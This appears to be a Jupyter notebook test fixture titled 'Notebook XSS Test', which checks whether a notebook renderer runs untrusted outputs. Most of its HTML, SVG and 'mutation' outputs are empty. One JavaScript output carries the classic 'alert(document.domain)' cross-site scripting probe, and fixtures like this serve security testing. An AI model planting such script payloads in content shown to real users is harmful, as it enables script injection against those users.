{"nbformat": 4, "nbformat_minor": 5, "metadata": {"kernelspec": {"display_name": "Python 3", "language": "python", "name": "python3"}, "language_info": {"name": "python", "version": "3.9.0"}}, "cells": [{"cell_type": "markdown", "metadata": {}, "source": ["# Notebook XSS Test"], "id": "c1"}, {"cell_type": "code", "metadata": {}, "source": ["print('hello')"], "id": "c2", "execution_count": 1, "outputs": [{"output_type": "display_data", "metadata": {}, "data": {"text/html": ["", "", ""]}}]}, {"cell_type": "code", "metadata": {}, "source": ["# SVG"], "id": "c3", "execution_count": 2, "outputs": [{"output_type": "display_data", "metadata": {}, "data": {"image/svg+xml": [""]}}]}, {"cell_type": "code", "metadata": {}, "source": ["# JS"], "id": "c4", "execution_count": 3, "outputs": [{"output_type": "display_data", "metadata": {}, "data": {"application/javascript": ["alert(document.domain)"]}}]}, {"cell_type": "code", "metadata": {}, "source": ["# Mutation"], "id": "c5", "execution_count": 4, "outputs": [{"output_type": "display_data", "metadata": {}, "data": {"text/html": [""]}}]}]}